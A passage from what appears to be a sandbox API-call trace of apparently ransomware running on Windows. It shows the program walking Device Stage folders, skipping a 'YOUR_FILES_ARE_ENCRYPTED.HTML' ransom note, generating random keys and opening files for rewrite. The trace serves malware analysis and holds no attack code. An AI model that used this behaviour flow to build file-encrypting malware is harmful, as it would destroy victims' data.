ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb19b80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, 
ftLastWriteTime.dwLowDateTime=0xcbb19b80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.796] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbacd8c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbacd8c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Device", cAlternateFileName="")) returned 1 [0169.796] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device") returned 52 [0169.796] GetProcessHeap () returned 0x270000 [0169.796] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.796] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device" [0169.796] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*" [0169.796] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbacd8c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbacd8c0, 
ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.796] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbacd8c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbacd8c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.796] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbacd8c0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbacd8c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbacd8c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.797] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 82 [0169.797] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.797] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbaa7760, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaa7760, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 
dwReserved1=0x60, cFileName="{113527a4-45d4-4b6f-b567-97838f1b04b0}", cAlternateFileName="{11352~1")) returned 1 [0169.797] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned 91 [0169.797] GetProcessHeap () returned 0x270000 [0169.797] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0169.797] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}" [0169.797] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*" [0169.797] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbaa7760, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaa7760, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0169.797] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, 
ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbaa7760, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaa7760, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.797] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa825f5e7, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa825f5e7, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d7b99dc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x1fad1, dwReserved0=0x0, dwReserved1=0x60, cFileName="background.png", cAlternateFileName="")) returned 1 [0169.797] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png") returned 106 [0169.797] lstrcmpW (lpString1="background.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.797] PathFindExtensionW (pszPath="background.png") returned=".png" [0169.797] lstrlenW (lpString=".png") returned 4 [0169.797] PathFindExtensionW (pszPath="background.png") returned=".png" [0169.797] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0169.798] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff 
[0169.798] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1dad96bc, ftCreationTime.dwHighDateTime=0x1c9ea14, ftLastAccessTime.dwLowDateTime=0x1dad96bc, ftLastAccessTime.dwHighDateTime=0x1c9ea14, ftLastWriteTime.dwLowDateTime=0x1dad96bc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xb61, dwReserved0=0x0, dwReserved1=0x60, cFileName="behavior.xml", cAlternateFileName="")) returned 1 [0169.798] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml") returned 104 [0169.798] lstrcmpW (lpString1="behavior.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.798] PathFindExtensionW (pszPath="behavior.xml") returned=".xml" [0169.798] lstrlenW (lpString=".xml") returned 4 [0169.798] PathFindExtensionW (pszPath="behavior.xml") returned=".xml" [0169.798] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0169.798] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.798] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8285746, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa8285746, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d7dfb3c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, 
nFileSizeHigh=0x0, nFileSizeLow=0xadc8, dwReserved0=0x0, dwReserved1=0x60, cFileName="device.png", cAlternateFileName="")) returned 1 [0169.798] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png") returned 102 [0169.798] lstrcmpW (lpString1="device.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.798] PathFindExtensionW (pszPath="device.png") returned=".png" [0169.798] lstrlenW (lpString=".png") returned 4 [0169.798] PathFindExtensionW (pszPath="device.png") returned=".png" [0169.798] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0169.798] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.799] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa82ab8a5, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa82ab8a5, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d8c437c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x0, dwReserved1=0x60, cFileName="overlay.png", cAlternateFileName="")) returned 1 [0169.799] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png") returned 103 [0169.799] lstrcmpW (lpString1="overlay.png", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.799] PathFindExtensionW (pszPath="overlay.png") returned=".png" [0169.799] lstrlenW (lpString=".png") returned 4 [0169.799] PathFindExtensionW (pszPath="overlay.png") returned=".png" [0169.799] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0169.799] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.799] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa82d1a04, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa82d1a04, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d8c437c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x99d3, dwReserved0=0x0, dwReserved1=0x60, cFileName="superbar.png", cAlternateFileName="")) returned 1 [0169.799] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png") returned 104 [0169.799] lstrcmpW (lpString1="superbar.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.799] PathFindExtensionW (pszPath="superbar.png") returned=".png" [0169.799] lstrlenW (lpString=".png") returned 4 [0169.799] PathFindExtensionW (pszPath="superbar.png") returned=".png" [0169.799] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0169.799] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.800] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbaa7760, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbaa7760, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaa7760, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.800] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0169.800] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.800] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbaa7760, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbaa7760, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaa7760, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.800] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0169.800] wnsprintfW (in: 
pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0169.800] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.800] GetProcessHeap () returned 0x270000 [0169.801] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0169.801] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbaa7760, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaa7760, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{8702d817-5aad-4674-9ef3-4d3decd87120}", cAlternateFileName="{8702D~1")) returned 1 [0169.801] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}") returned 91 [0169.801] GetProcessHeap () returned 0x270000 [0169.801] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0169.801] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device 
Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}" [0169.801] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*" [0169.801] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbaa7760, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaa7760, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0169.801] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbaa7760, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaa7760, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.801] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a06b8bc, ftCreationTime.dwHighDateTime=0x1c9ea14, ftLastAccessTime.dwLowDateTime=0x2a06b8bc, ftLastAccessTime.dwHighDateTime=0x1c9ea14, 
ftLastWriteTime.dwLowDateTime=0x2a06b8bc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x1fad1, dwReserved0=0x0, dwReserved1=0x60, cFileName="background.png", cAlternateFileName="")) returned 1 [0169.801] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png") returned 106 [0169.802] lstrcmpW (lpString1="background.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.802] PathFindExtensionW (pszPath="background.png") returned=".png" [0169.802] lstrlenW (lpString=".png") returned 4 [0169.802] PathFindExtensionW (pszPath="background.png") returned=".png" [0169.802] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0169.802] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.802] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64cf1c24, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x64cf1c24, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x2a06b8bc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x769, dwReserved0=0x0, dwReserved1=0x60, cFileName="behavior.xml", cAlternateFileName="")) returned 1 [0169.802] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device 
Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml") returned 104 [0169.802] lstrcmpW (lpString1="behavior.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.802] PathFindExtensionW (pszPath="behavior.xml") returned=".xml" [0169.802] lstrlenW (lpString=".xml") returned 4 [0169.802] PathFindExtensionW (pszPath="behavior.xml") returned=".xml" [0169.802] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0169.802] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.802] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64d3dee4, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x64d3dee4, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x2a2ccebc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x0, dwReserved1=0x60, cFileName="watermark.png", cAlternateFileName="")) returned 1 [0169.802] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png") returned 105 [0169.803] lstrcmpW (lpString1="watermark.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.803] PathFindExtensionW (pszPath="watermark.png") returned=".png" [0169.803] lstrlenW (lpString=".png") returned 4 [0169.803] PathFindExtensionW (pszPath="watermark.png") returned=".png" 
[0169.803] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0169.803] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.803] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbaa7760, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbaa7760, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaa7760, ftLastWriteTime.dwHighDateTime=0x1d7fb46, 